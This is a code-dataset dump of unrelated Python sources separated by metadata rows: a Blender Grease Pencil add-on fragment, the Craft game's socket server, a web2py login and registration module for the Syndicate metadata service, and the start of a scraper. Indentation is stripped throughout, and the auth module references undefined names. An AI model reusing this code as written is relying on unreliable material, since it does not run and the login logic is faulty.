return {'FINISHED'}
class OBJECT_OT4_ToolsButton(bpy.types.Operator):
bl_idname = "drawenv.gen"
bl_label = "Generate environment"
def execute(self, context):
global benv
scn = context.scene
# bpy.ops.view3d.viewnumpad(type='CAMERA', align_active=False)
# scaling = max(bb[2] - bb[0], max(bb[2] - bb[0], bb[3] - bb[1])bb[3] - bb[1]) / 28
scaling = 1
shapes = [[] for i in range(scn["i"])]
for i in range(scn["i"]):
try:
for p in bpy.data.grease_pencil[0].layers[i].active_frame.strokes[0].points:
shapes[i].append((scaling * p.co.x, - scaling * p.co.y))
except AttributeError:
pass
bb = bounds(shapes[0])
for shape in shapes[1:]:
if(shape != []):
s = bounds(shape)
bb = (min(bb[0], s[0]), min(bb[1], s[1]), max(bb[2], s[2]), max(bb[3], s[3]))
res_x = int(bb[2] - bb[0])
res_y = int(bb[3] - bb[1])
print("Res x %d; res y %d" % (res_x, res_y))
my_features = [gen_feature(feature_list[i], model_number_list[i], image_path_list[i], shapes[i], (-bb[0], -bb[1]), scaling, scn) for i in range(len(shapes)) if shapes[i] != []]
env = Environment(my_features, x=res_x, y=res_y)
benv = BlendEnvironment((-bb[0], -bb[1]), (res_x, res_y))
# scn["models_scale"] = 1 / (max(bb[2] - bb[0], bb[3] - bb[1]) // (2*scaling))
benv.export_img(env, 2)
for i in range(scn["i"]):
bpy.data.grease_pencil[0].layers[i].hide = not bpy.data.grease_pencil["GPencil"].layers[i].hide
return {'FINISHED'}
def bounds(point_list):
min_x, min_y = point_list[0]
max_x, max_y = point_list[0]
for p in point_list[1:]:
min_x = min(min_x, p[0])
max_x = max(max_x, p[0])
min_y = min(min_y, p[1])
max_y = max(max_y, p[1])
return (min_x, min_y, max_x, max_y)
class FeaturePanel(bpy.types.Panel):
bl_category = "Environment"
bl_label = "Feature choice"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
def draw(self, context):
layout = self.layout
scn = context.scene
layout.prop(scn, 'MyEnum')
class ToolsPanel(bpy.types.Panel):
bl_category = "Environment"
bl_label = "Environment panel"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
def draw(self, context):
layout = self.layout
scn = context.scene
layout.operator("drawenv.execute")
layout.operator("drawenv.stop")
layout.operator("drawenv.gen")
layout.operator("drawenv.print")
layout.operator("drawenv.hide")
class EnvParamPanel(bpy.types.Panel):
bl_category = "Environment"
bl_label = "Model parameters"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
def draw(self, context):
layout = self.layout
scn = context.scene
layout.prop(scn, 'model_number')
layout.prop(scn, 'model_scaling')
layout.prop(scn, 'model_path')
class ImgParamPanel(bpy.types.Panel):
bl_category = "Environment"
bl_label = "Image parameters"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
def draw(self, context):
layout = self.layout
scn = context.scene
layout.prop(scn, 'image_path')
if __name__ == "__main__":
initSceneProperties(bpy.context.scene)
bpy.utils.register_module(__name__)
| gpl-3.0 | -8,310,356,213,299,858,000 | 33.784566 | 184 | 0.592808 | false | 3.124783 | false | false | false |
mynameisfashanu/Craft | server.py | 1 | 11016 | from math import floor
import Queue
import SocketServer
import datetime
import random
import re
import sqlite3
import sys
import threading
import time
import traceback
HOST = '0.0.0.0'
PORT = 4080
CHUNK_SIZE = 32
BUFFER_SIZE = 1024
SPAWN_POINT = (0, 0, 0, 0, 0)
DB_PATH = 'craft.db'
COMMIT_INTERVAL = 5
YOU = 'U'
BLOCK = 'B'
CHUNK = 'C'
POSITION = 'P'
DISCONNECT = 'D'
TALK = 'T'
KEY = 'K'
def log(*args):
now = datetime.datetime.utcnow()
print now, ' '.join(map(str, args))
def chunked(x):
return int(floor(round(x) / CHUNK_SIZE))
class Server(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
daemon_threads = True
class Handler(SocketServer.BaseRequestHandler):
def setup(self):
self.queue = Queue.Queue()
self.running = True
self.start()
def handle(self):
model = self.server.model
model.enqueue(model.on_connect, self)
try:
buf = []
while True:
data = self.request.recv(BUFFER_SIZE)
if not data:
break
buf.extend(data.replace('\r', ''))
while '\n' in buf:
index = buf.index('\n')
line = ''.join(buf[:index])
buf = buf[index + 1:]
model.enqueue(model.on_data, self, line)
finally:
model.enqueue(model.on_disconnect, self)
def finish(self):
self.running = False
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
def run(self):
while self.running:
try:
buf = []
try:
buf.append(self.queue.get(timeout=5))
try:
while True:
buf.append(self.queue.get(False))
except Queue.Empty:
pass
except Queue.Empty:
continue
data = ''.join(buf)
self.request.sendall(data)
except Exception:
self.request.close()
raise
def send_raw(self, data):
if data:
self.queue.put(data)
def send(self, *args):
data = '%s\n' % ','.join(map(str, args))
#log('SEND', self.client_id, data[:-1])
self.send_raw(data)
class Model(object):
def __init__(self):
self.clients = []
self.queue = Queue.Queue()
self.commands = {
CHUNK: self.on_chunk,
BLOCK: self.on_block,
POSITION: self.on_position,
TALK: self.on_talk,
}
self.patterns = [
(re.compile(r'^/nick(?:\s+(\S+))?$'), self.on_nick),
(re.compile(r'^/spawn$'), self.on_spawn),
(re.compile(r'^/goto(?:\s+(\S+))?$'), self.on_goto),
(re.compile(r'^/pq\s+(-?[0-9]+)\s*,?\s*(-?[0-9]+)$'), self.on_pq),
(re.compile(r'^/help$'), self.on_help),
(re.compile(r'^/players$'), self.on_players),
]
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
def run(self):
self.connection = sqlite3.connect(DB_PATH)
self.create_tables()
self.commit()
while True:
try:
if time.time() - self.last_commit > COMMIT_INTERVAL:
self.commit()
self.dequeue()
except Exception:
traceback.print_exc()
def enqueue(self, func, *args, **kwargs):
self.queue.put((func, args, kwargs))
def dequeue(self):
try:
func, args, kwargs = self.queue.get(timeout=5)
func(*args, **kwargs)
except Queue.Empty:
pass
def execute(self, *args, **kwargs):
return self.connection.execute(*args, **kwargs)
def commit(self):
self.last_commit = time.time()
self.connection.commit()
def create_tables(self):
queries = [
'create table if not exists block ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create index if not exists block_xyz_idx on block (x, y, z);',
'create unique index if not exists block_pqxyz_idx on '
' block (p, q, x, y, z);',
]
for query in queries:
self.execute(query)
def next_client_id(self):
result = 1
client_ids = set(x.client_id for x in self.clients)
while result in client_ids:
result += 1
return result
def on_connect(self, client):
client.client_id = self.next_client_id()
client.nick = 'player%d' % client.client_id
log('CONN', client.client_id, *client.client_address)
client.position = SPAWN_POINT
self.clients.append(client)
client.send(YOU, client.client_id, *client.position)
client.send(TALK, 'Welcome to Craft!')
client.send(TALK, 'Type "/help" for chat commands.')
self.send_position(client)
self.send_positions(client)
self.send_talk('%s has joined the game.' % client.nick)
def on_data(self, client, data):
#log('RECV', client.client_id, data)
args = data.split(',')
command, args = args[0], args[1:]
if command in self.commands:
func = self.commands[command]
func(client, *args)
def on_disconnect(self, client):
log('DISC', client.client_id, *client.client_address)
self.clients.remove(client)
self.send_disconnect(client)
self.send_talk('%s has disconnected from the server.' % client.nick)
def on_chunk(self, client, p, q, key=0):
p, q, key = map(int, (p, q, key))
query = (
'select rowid, x, y, z, w from block where '
'p = :p and q = :q and rowid > :key;'
)
rows = self.execute(query, dict(p=p, q=q, key=key))
max_rowid = 0
for rowid, x, y, z, w in rows:
client.send(BLOCK, p, q, x, y, z, w)
max_rowid = max(max_rowid, rowid)
if max_rowid:
client.send(KEY, p, q, max_rowid)
def on_block(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
if y <= 0 or y > 255 or w < 0 or w > 11:
return
p, q = chunked(x), chunked(z)
query = (
'insert or replace into block (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_block(client, p, q, x, y, z, w)
if chunked(x - 1) != p:
self.execute(query, dict(p=p - 1, q=q, x=x, y=y, z=z, w=-w))
self.send_block(client, p - 1, q, x, y, z, -w)
if chunked(x + 1) != p:
self.execute(query, dict(p=p + 1, q=q, x=x, y=y, z=z, w=-w))
self.send_block(client, p + 1, q, x, y, z, -w)
if chunked(z - 1) != q:
self.execute(query, dict(p=p, q=q - 1, x=x, y=y, z=z, w=-w))
self.send_block(client, p, q - 1, x, y, z, -w)
if chunked(z + 1) != q:
self.execute(query, dict(p=p, q=q + 1, x=x, y=y, z=z, w=-w))
self.send_block(client, p, q + 1, x, y, z, -w)
def on_position(self, client, x, y, z, rx, ry):
x, y, z, rx, ry = map(float, (x, y, z, rx, ry))
client.position = (x, y, z, rx, ry)
self.send_position(client)
def on_talk(self, client, *args):
text = ','.join(args)
if text.startswith('/'):
for pattern, func in self.patterns:
match = pattern.match(text)
if match:
func(client, *match.groups())
break
else:
client.send(TALK, 'Unrecognized command: "%s"' % text)
else:
self.send_talk('%s> %s' % (client.nick, text))
def on_nick(self, client, nick=None):
if nick is None:
client.send(TALK, 'Your nickname is %s' % client.nick)
else:
self.send_talk('%s is now known as %s' % (client.nick, nick))
client.nick = nick
def on_spawn(self, client):
client.position = SPAWN_POINT
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_goto(self, client, nick=None):
if nick is None:
clients = [x for x in self.clients if x != client]
other = random.choice(self.clients) if clients else None
else:
nicks = dict((client.nick, client) for client in self.clients)
other = nicks.get(nick)
if other:
client.position = other.position
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_pq(self, client, p, q):
p, q = map(int, (p, q))
if abs(p) > 1000 or abs(q) > 1000:
return
client.position = (p * CHUNK_SIZE, 0, q * CHUNK_SIZE, 0, 0)
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_help(self, client):
client.send(TALK, 'Type "t" to chat with other players.')
client.send(TALK, 'Type "/" to start typing a command.')
client.send(TALK,
'Commands: /goto [NAME], /help, /nick [NAME], /players, /spawn')
def on_players(self, client):
client.send(TALK,
'Players: %s' % ', '.join(x.nick for x in self.clients))
def send_positions(self, client):
for other in self.clients:
if other == client:
continue
client.send(POSITION, other.client_id, *other.position)
def send_position(self, client):
for other in self.clients:
if other == client:
continue
other.send(POSITION, client.client_id, *client.position)
def send_disconnect(self, client):
for other in self.clients:
if other == client:
continue
other.send(DISCONNECT, client.client_id)
def send_block(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(BLOCK, p, q, x, y, z, w)
def send_talk(self, text):
for client in self.clients:
client.send(TALK, text)
def main():
host, port = HOST, PORT
if len(sys.argv) > 1:
host = sys.argv[1]
if len(sys.argv) > 2:
port = int(sys.argv[2])
log('SERV', host, port)
model = Model()
model.start()
server = Server((host, port), Handler)
server.model = model
server.serve_forever()
if __name__ == '__main__':
main()
| mit | -343,538,699,915,906,300 | 34.307692 | 78 | 0.51398 | false | 3.473983 | false | false | false |
jcnelson/syndicate | old/md-service/SMDS/web2py/extras/SMDS_auth.py | 2 | 29953 | """
SMDS authentication module for web2py.
Parts borrowed from /usr/share/python-support/python-gluon/gluon/tools.py
"""
import sys
sys.path.append( "/usr/share/syndicate_md" )
sys.path.append( "/usr/share/python-support/python-gluon/" )
import base64
import cPickle
import datetime
import thread
import logging
import sys
import os
import re
import time
import copy
import smtplib
import urllib
import urllib2
import Cookie
import cStringIO
from email import MIMEBase, MIMEMultipart, MIMEText, Encoders, Header, message_from_string
from gluon.contenttype import contenttype
from gluon.storage import Storage, StorageList, Settings, Messages
from gluon.utils import web2py_uuid
from gluon import *
from gluon.fileutils import read_file
from gluon.html import *
import gluon.serializers
import gluon.contrib.simplejson as simplejson
from SMDS.mdapi import MDAPI
from SMDS.auth import auth_user_from_email, auth_password_check
from SMDS.user import *
from SMDS.web2py.extras import SMDS_validators
import SMDS.logger as logger
from gluon.tools import Auth as GluonAuth
logger.init( "/tmp/SMDS_Auth.log" )
DEFAULT = lambda: None
def callback(actions,form,tablename=None):
if actions:
if tablename and isinstance(actions,dict):
actions = actions.get(tablename, [])
if not isinstance(actions,(list, tuple)):
actions = [actions]
[action(form) for action in actions]
def validators(*a):
b = []
for item in a:
if isinstance(item, (list, tuple)):
b = b + list(item)
else:
b.append(item)
return b
def call_or_redirect(f,*args):
if callable(f):
redirect(f(*args))
else:
redirect(f)
def dict_to_Rows( my_dict ):
extra_dict = {'_extra': my_dict}
row = Row( extra_dict )
rows = Rows( records=[row], colnames=list(my_dict.keys()), compact=False )
return rows
class SMDS_Auth( GluonAuth ):
"""
web2py Authentication module for SMDS
"""
def __init__(self, api):
"""
auth=Auth(globals(), db)
- environment is there for legacy but unused (awful)
- db has to be the database where to create tables for authentication
"""
controller = 'default'
cas_provider = None
self.db = None
self.environment = current
request = current.request
session = current.session
auth = session.auth
if auth and auth.last_visit and auth.last_visit + \
datetime.timedelta(days=0, seconds=auth.expiration) > request.now:
self.user = auth.user
# this is a trick to speed up sessions
if (request.now - auth.last_visit).seconds > (auth.expiration/10):
auth.last_visit = request.now
else:
self.user = None
session.auth = None
settings = self.settings = Settings()
# ## what happens after login?
# ## what happens after registration?
settings.hideerror = False
settings.cas_domains = [request.env.http_host]
settings.cas_provider = cas_provider
settings.extra_fields = {}
settings.actions_disabled = []
settings.reset_password_requires_verification = False
settings.registration_requires_verification = False
settings.registration_requires_approval = True
settings.alternate_requires_registration = False
settings.create_user_groups = False
settings.controller = controller
settings.login_url = self.url('user', args='login')
settings.logged_url = self.url('user', args='profile')
settings.download_url = self.url('download')
settings.mailer = None
settings.login_captcha = None
settings.register_captcha = None
settings.retrieve_username_captcha = None
settings.retrieve_password_captcha = None
settings.captcha = None
settings.expiration = 3600 # one hour
settings.long_expiration = 3600*30*24 # one month
settings.remember_me_form = False
settings.allow_basic_login = False
settings.allow_basic_login_only = False
settings.on_failed_authorization = \
self.url('user',args='not_authorized')
settings.on_failed_authentication = lambda x: redirect(x)
settings.formstyle = 'table3cols'
settings.label_separator = ': '
# ## table names to be used
settings.password_field = 'password'
settings.table_user_name = 'auth_user'
settings.table_group_name = 'auth_group'
settings.table_membership_name = 'auth_membership'
settings.table_permission_name = 'auth_permission'
settings.table_event_name = 'auth_event'
settings.table_cas_name = 'auth_cas'
# ## if none, they will be created
settings.table_user = None
settings.table_group = None
settings.table_membership = None
settings.table_permission = None
settings.table_event = None
settings.table_cas = None
# ##
settings.showid = False
# ## these should be functions or lambdas
settings.login_next = self.url('index')
settings.login_onvalidation = []
settings.login_onaccept = []
settings.login_methods = [self]
settings.login_form = self
settings.login_email_validate = True
settings.login_userfield = "username"
settings.logout_next = self.url('index')
settings.logout_onlogout = lambda x: None
settings.register_next = self.url('index')
settings.register_onvalidation = []
settings.register_onaccept = []
settings.register_fields = None
settings.verify_email_next = self.url('user', args='login')
settings.verify_email_onaccept = []
settings.profile_next = self.url('index')
settings.profile_onvalidation = []
settings.profile_onaccept = []
settings.profile_fields = None
settings.retrieve_username_next = self.url('index')
settings.retrieve_password_next = self.url('index')
settings.request_reset_password_next = self.url('user', args='login')
settings.reset_password_next = self.url('user', args='login')
settings.change_password_next = self.url('index')
settings.change_password_onvalidation = []
settings.change_password_onaccept = []
settings.retrieve_password_onvalidation = []
settings.reset_password_onvalidation = []
settings.hmac_key = None
settings.lock_keys = True
# ## these are messages that can be customized
messages = self.messages = Messages(current.T)
messages.login_button = 'Login'
messages.register_button = 'Register'
messages.password_reset_button = 'Request reset password'
messages.password_change_button = 'Change password'
messages.profile_save_button = 'Save profile'
messages.submit_button = 'Submit'
messages.verify_password = 'Verify Password'
messages.delete_label = 'Check to delete:'
messages.function_disabled = 'Function disabled'
messages.access_denied = 'Insufficient privileges'
messages.registration_verifying = 'Registration needs verification'
messages.registration_pending = 'Registration is pending approval'
messages.login_disabled = 'Login disabled by administrator'
messages.logged_in = 'Logged in'
messages.email_sent = 'Email sent'
messages.unable_to_send_email = 'Unable to send email'
messages.email_verified = 'Email verified'
messages.logged_out = 'Logged out'
messages.registration_successful = 'Registration successful'
messages.invalid_email = 'Invalid email'
messages.unable_send_email = 'Unable to send email'
messages.invalid_login = 'Invalid login'
messages.invalid_user = 'Invalid user'
messages.invalid_password = 'Invalid password'
messages.is_empty = "Cannot be empty"
messages.mismatched_password = "Password fields don't match"
messages.verify_email = 'A user wishes to join Syndicate.\nDetails:\n Username: %(username)s\n Email: %(email)s'
messages.verify_email_subject = 'Email verification'
messages.username_sent = 'Your username was emailed to you'
messages.new_password_sent = 'A new password was emailed to you'
messages.password_changed = 'Password changed'
messages.retrieve_username = 'Your username is: %(username)s'
messages.retrieve_username_subject = 'Username retrieve'
messages.retrieve_password = 'Your password is: %(password)s'
messages.retrieve_password_subject = 'Password retrieve'
messages.reset_password = \
'Click on the link http://...reset_password/%(key)s to reset your password'
messages.reset_password_subject = 'Password reset'
messages.invalid_reset_password = 'Invalid reset password'
messages.profile_updated = 'Profile updated'
messages.new_password = 'New password'
messages.old_password = 'Old password'
messages.group_description = \
'Group uniquely assigned to user %(id)s'
messages.register_log = 'User %(id)s Registered'
messages.login_log = 'User %(id)s Logged-in'
messages.login_failed_log = None
messages.logout_log = 'User %(id)s Logged-out'
messages.profile_log = 'User %(id)s Profile updated'
messages.verify_email_log = 'User %(id)s Verification email sent'
messages.retrieve_username_log = 'User %(id)s Username retrieved'
messages.retrieve_password_log = 'User %(id)s Password retrieved'
messages.reset_password_log = 'User %(id)s Password reset'
messages.change_password_log = 'User %(id)s Password changed'
messages.add_group_log = 'Group %(group_id)s created'
messages.del_group_log = 'Group %(group_id)s deleted'
messages.add_membership_log = None
messages.del_membership_log = None
messages.has_membership_log = None
messages.add_permission_log = None
messages.del_permission_log = None
messages.has_permission_log = None
messages.impersonate_log = 'User %(id)s is impersonating %(other_id)s'
messages.label_first_name = 'First name'
messages.label_last_name = 'Last name'
messages.label_username = 'Username'
messages.label_email = 'E-mail'
messages.label_password = 'Password'
messages.label_registration_key = 'Registration key'
messages.label_reset_password_key = 'Reset Password key'
messages.label_registration_id = 'Registration identifier'
messages.label_role = 'Role'
messages.label_description = 'Description'
messages.label_user_id = 'User ID'
messages.label_group_id = 'Group ID'
messages.label_name = 'Name'
messages.label_table_name = 'Table name'
messages.label_record_id = 'Record ID'
messages.label_time_stamp = 'Timestamp'
messages.label_client_ip = 'Client IP'
messages.label_origin = 'Origin'
messages.label_remember_me = "Remember me (for 30 days)"
messages['T'] = current.T
messages.verify_password_comment = 'please input your password again'
messages.lock_keys = True
self.user = None
self.api = api
self.maint_email = api.config.MD_MAIL_SUPPORT_ADDRESS
# disable stuff for now
settings.actions_disabled.append('retrieve_username')
settings.actions_disabled.append('retrieve_password')
settings.actions_disabled.append('request_reset_password')
settings.actions_disabled.append('profile')
settings.actions_disabled.append('change_password')
def _get_user_id(self):
"accessor for auth.user_id"
return (self.user and self.user.get('user_id')) or None
user_id = property(_get_user_id, doc="user.id or None")
def _HTTP(self, *a, **b):
"""
only used in lambda: self._HTTP(404)
"""
raise HTTP(*a, **b)
def __call__(self):
"""
usage:
def authentication(): return dict(form=auth())
"""
request = current.request
args = request.args
if not args:
redirect(self.url(args='login',vars=request.vars))
elif args[0] in self.settings.actions_disabled:
raise HTTP(404)
"""
if args[0] in ('login','logout','register','verify_email',
'retrieve_username','retrieve_password',
'reset_password','request_reset_password',
'change_password','profile','groups',
'impersonate','not_authorized'):
"""
if args[0] in ('login','logout','register','not_authorized'):
return getattr(self,args[0])()
else:
raise HTTP(404)
def navbar(self,prefix='Welcome',action=None):
"""
Create a pretty navigation bar
"""
try:
user = None
session = current.session
if session.auth:
user = session.auth['user']
request = current.request
T = current.T
if isinstance(prefix,str):
prefix = T(prefix)
if not action:
action=URL(request.application,request.controller,'user')
if prefix:
prefix = prefix.strip()+' '
if user:
logout=A(T('logout'),_href=action+'/logout')
profile=A(T('profile'),_href=action+'/profile')
password=A(T('password'),_href=action+'/change_password')
bar = SPAN(prefix, user['username'],' [ ', logout, ']',_class='auth_navbar')
if not 'profile' in self.settings.actions_disabled:
bar.insert(4, ' | ')
bar.insert(5, profile)
if not 'change_password' in self.settings.actions_disabled:
bar.insert(-1, ' | ')
bar.insert(-1, password)
else:
login=A(T('login'),_href=action+'/login')
register=A(T('register'),_href=action+'/register')
retrieve_username=A(T('forgot username?'),
_href=action+'/retrieve_username')
lost_password=A(T('lost password?'),
_href=action+'/request_reset_password')
bar = SPAN('[ ',login,' ]',_class='auth_navbar')
if not 'register' in self.settings.actions_disabled:
bar.insert(2, ' | ')
bar.insert(3, register)
if 'username' in User.public_fieldnames and not 'retrieve_username' in self.settings.actions_disabled:
bar.insert(-1, ' | ')
bar.insert(-1, retrieve_username)
if not 'request_reset_password' in self.settings.actions_disabled:
bar.insert(-1, ' | ')
bar.insert(-1, lost_password)
return bar
except Exception, e:
logger.exception(e, "Navbar error")
logger.flush()
def define_tables(self, username=None, migrate=None, fake_migrate=None):
""" Do NOT define tables """
pass
def register(self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT):
"""
Register a new user
"""
request = current.request
response = current.response
session = current.session
if self.is_logged_in():
# don't allow registration if we're already logged in
redirect(self.settings.logged_url)
# fill in defaults
if next == DEFAULT:
next = request.get_vars._next \
or request.post_vars._next \
or self.settings.register_next
if onvalidation == DEFAULT:
onvalidation = self.settings.register_onvalidation
if onaccept == DEFAULT:
onaccept = self.settings.register_onaccept
if log == DEFAULT:
log = self.messages.register_log
# create a form...
userfield = self.settings.login_userfield
passfield = self.settings.password_field
formstyle = self.settings.formstyle
form =FORM( \
TABLE( \
TR(TD('Username:'), TD(INPUT(_name="username",_type="text",requires=IS_SLUG(error_message="Invalid username")))), \
TR(TD('Email:'), TD(INPUT(_name="email", _type="text",requires=IS_EMAIL(error_message=self.messages.invalid_email)))), \
TR(TD('Password:'), TD(INPUT(_name="password", _type="password"))), \
TR(TD('Re-type Password:'), TD(INPUT(_name="password2", _type="password", \
requires=IS_EXPR("value==%s" % repr(request.vars.get('password',None))), \
error_message=self.settings.mismatched_password))) \
), \
INPUT(_type="Submit",_value="Register"), \
_name="register"
)
if form.accepts(request, session, formname='register', onvalidation=onvalidation,hideerror=self.settings.hideerror):
# verify that the password forms are the same
if form.vars['password'] != form.vars['password2']:
response.flash = messages.mismatched_password
# inform the admin
"""
if not self.settings.mailer or \
not self.settings.mailer.send(
to=self.maint_email,
subject=self.messages.verify_email_subject,
message=self.messages.verify_email % dict(username=form.vars['username'], email=form.vars['email'])):
response.flash = self.messages.unable_send_email
return form
session.flash = self.messages.email_sent
"""
# make sure this user does not exist
rc = 0
msg = ""
try:
user = Users(self.api, {'username': form.vars['username']})[0]
rc = -1 # already exists
msg = "User already exists"
except:
pass
# create the user
if rc == 0:
try:
user_fields = {'username': form.vars['username'], 'password': form.vars['password'], 'email': form.vars['email']}
rc = self.api.call( ("127.0.0.1", "localhost"), "AddUser", self.api.maint_auth, user_fields )
except Exception, e:
logger.exception(e, "register: exception")
logger.flush()
msg = "User could not be registered"
rc = -1
if rc < 0:
response.flash = msg
logger.error("Failed to add user '%s' (email '%s')" % (user_fields['username'], user_fields['email']) )
return form
session.flash = self.messages.registration_pending
if log:
logger.info("Added user '%s' (email '%s')" % (user_fields['username'], user_fields['email']) )
callback(onaccept,form)
if not next:
next = self.url(args = request.args)
elif isinstance(next, (list, tuple)): ### fix issue with 2.6
next = next[0]
elif next and not next[0] == '/' and next[:4] != 'http':
next = self.url(next.replace('[id]', str(form.vars.id)))
redirect(next)
return form
def login_bare( self, username, password ):
"""
Bare essentials login.
"""
api = MDAPI()
user = None
try:
user = auth_user_from_email( api, username )
except Exception, e:
logger.error( "User '%s' could not be authenticated (exception = %s)" % (username, e) )
return False
rc = False
auth_struct = {'AuthMethod': 'password', 'Username': user['username'], 'AuthString': password}
try:
rc = auth_password_check( api, auth_struct, user, None )
except Exception, e:
logger.error( "User '%s' failed to authenticate" % username)
if rc and user:
user_public = user.public()
user_stored = Storage(user_public)
if log:
logger.info("SMDS_Auth: User '%s' logged in" % user_public['username'])
# process authenticated users
# user wants to be logged in for longer
session.auth = Storage(
user = user_stored,
last_visit = request.now,
expiration = self.settings.expiration,
hmac_key = web2py_uuid()
)
self.user = user_public
logger.info("SMDS_Auth: user_id = %s" % self.user_id)
logger.flush()
return user
return rc
def login(self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT):
"""
Handle a login request, and redirect.
"""
request = current.request
response = current.response
session = current.session
username_field = self.settings.login_userfield
password_field = self.settings.password_field
if next == DEFAULT:
next = request.get_vars._next \
or request.post_vars._next \
or self.settings.login_next
if onvalidation == DEFAULT:
onvalidation = self.settings.login_onvalidation
if onaccept == DEFAULT:
onaccept = self.settings.login_onaccept
if log == DEFAULT:
log = self.messages.login_log
user = None
accepted_form = False
if self.settings.login_form == self:
# this object was responsible for logging in
form =FORM( \
TABLE( \
TR(TD('Username:'), TD(INPUT(_name="username",_type="text",requires=IS_SLUG(error_message="Invalid Username")))), \
TR(TD('Password:'), TD(INPUT(_name="password", _type="password"))) \
), \
INPUT(_type="Submit",_value="Login"), \
_name="login"
)
if form.accepts(request.vars, session,
formname='login',
onvalidation=onvalidation,
hideerror=self.settings.hideerror):
# sanitize inputs
accepted_form = True
# check for username in db
username = form.vars[username_field]
user = None
try:
user = Users( self.api, {'username': username} )[0]
except:
pass
if user:
# user in db, check if registration pending or disabled
temp_user = user
if temp_user['enabled'] == False:
# user is not yet enabled
response.flash = self.messages.login_disabled
return form
# check password
try:
rc = auth_password_check( self.api, {'Username':user['username'], 'AuthMethod':'password', 'AuthString':form.vars[password_field]}, user, None )
except:
if log:
logger.error("SMDS_Auth: User '%s' authentication failed (invalid credentials)" % user['username'] )
logger.flush()
user = None # invalid credentials
if not user:
if log:
logger.error("SMDS_Auth: User could not be looked up" )
logger.flush()
# invalid login
session.flash = self.messages.invalid_login
redirect(self.url(args=request.args,vars=request.get_vars))
if user:
user_public = user.public()
user_stored = Storage(user_public)
if log:
logger.info("SMDS_Auth: User '%s' logged in" % user_public['username'])
# process authenticated users
# user wants to be logged in for longer
session.auth = Storage(
user = user_stored,
last_visit = request.now,
expiration = self.settings.long_expiration,
remember = request.vars.has_key("remember"),
hmac_key = web2py_uuid()
)
self.user = user_public
logger.info("SMDS_Auth: user_id = %s" % self.user_id)
logger.flush()
session.flash = self.messages.logged_in
# how to continue
if self.settings.login_form == self:
if accepted_form:
callback(onaccept,form)
if isinstance(next, (list, tuple)):
# fix issue with 2.6
next = next[0]
if next and not next[0] == '/' and next[:4] != 'http':
next = self.url(next.replace('[id]', str(form.vars.id)))
redirect(next)
return form
elif user:
callback(onaccept,None)
redirect(next)
def logout(self, next=DEFAULT, onlogout=DEFAULT, log=DEFAULT):
"""
Handle a logout
"""
session = current.session
user = None
if session.auth:
user = session.auth['user']
self.user = user
if log:
if user:
logger.info("SMDS_Auth: User '%s' logged out" % user['username'])
logger.flush()
next = self.settings.logout_next
#super(SMDS_Auth, self).logout( lambda x: redirect(self.url('index')), lambda x, log )
if next == DEFAULT:
next = self.settings.logout_next
"""
if onlogout == DEFAULT:
onlogout = self.settings.logout_onlogout
if onlogout:
onlogout(self.user)
if log == DEFAULT:
log = self.messages.logout_log
if log and self.user:
self.log_event(log % self.user)
if self.settings.login_form != self:
cas = self.settings.login_form
cas_user = cas.get_user()
if cas_user:
next = cas.logout_url(next)
"""
current.session.auth = None
current.session.flash = self.messages.logged_out
if next:
redirect(next)
def requires_login(self):
"""
decorator that prevents access to action if not logged in
"""
def decorator(action):
def f(*a, **b):
if self.settings.allow_basic_login_only and not self.basic():
if current.request.is_restful:
raise HTTP(403,"Not authorized")
return call_or_redirect(self.settings.on_failed_authorization)
if not self.basic() and not current.session.auth: #self.is_logged_in():
if current.request.is_restful:
raise HTTP(403,"Not authorized")
request = current.request
next = URL(r=request,args=request.args,
vars=request.get_vars)
current.session.flash = current.response.flash
return call_or_redirect(
self.settings.on_failed_authentication,
self.settings.login_url + '?_next='+urllib.quote(next)
)
return action(*a, **b)
f.__doc__ = action.__doc__
f.__name__ = action.__name__
f.__dict__.update(action.__dict__)
return f
return decorator
def profile(self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT):
pass
def change_password(self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT):
pass
def verify_email(self, next=DEFAULT, onaccept=DEFAULT, log=DEFAULT ):
pass
def retrieve_username(self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT ):
pass
def request_reset_password( self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT ):
pass
def reset_password( self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT ):
pass
def impersonate( self, user_id=DEFAULT ):
pass
def groups( self ):
pass
def not_authorized( self ):
""" YOU SHALL NOT PASS """
return 'ACCESS DENIED'
def SMDS_authentication( logfile="/tmp/SMDS_login.log" ):
"""
Authenticate with the Syndicate metadata service
"""
logger.init( open(logfile, "a") )
def SMDS_auth_aux(username, password):
api = MDAPI()
user = None
try:
user = auth_user_from_email( api, username )
except Exception, e:
logger.error( "User '%s' could not be authenticated (exception = %s)" % (username, e) )
return False
rc = False
auth_struct = {'AuthMethod': 'password', 'Username': user['username'], 'AuthString': password}
try:
rc = auth_password_check( api, auth_struct, user, None )
except Exception, e:
logger.error( "User '%s' failed to authenticate" % username)
return rc
return SMDS_auth_aux
| apache-2.0 | 1,897,465,155,611,255,800 | 35.087952 | 164 | 0.567723 | false | 4.274115 | false | false | false |
is0280fp/Side-by-Side-Walking-Model | scraper.py | 1 | 4280 | from collections import defaultdict
import numpy as np
class UtilityScraper(object):
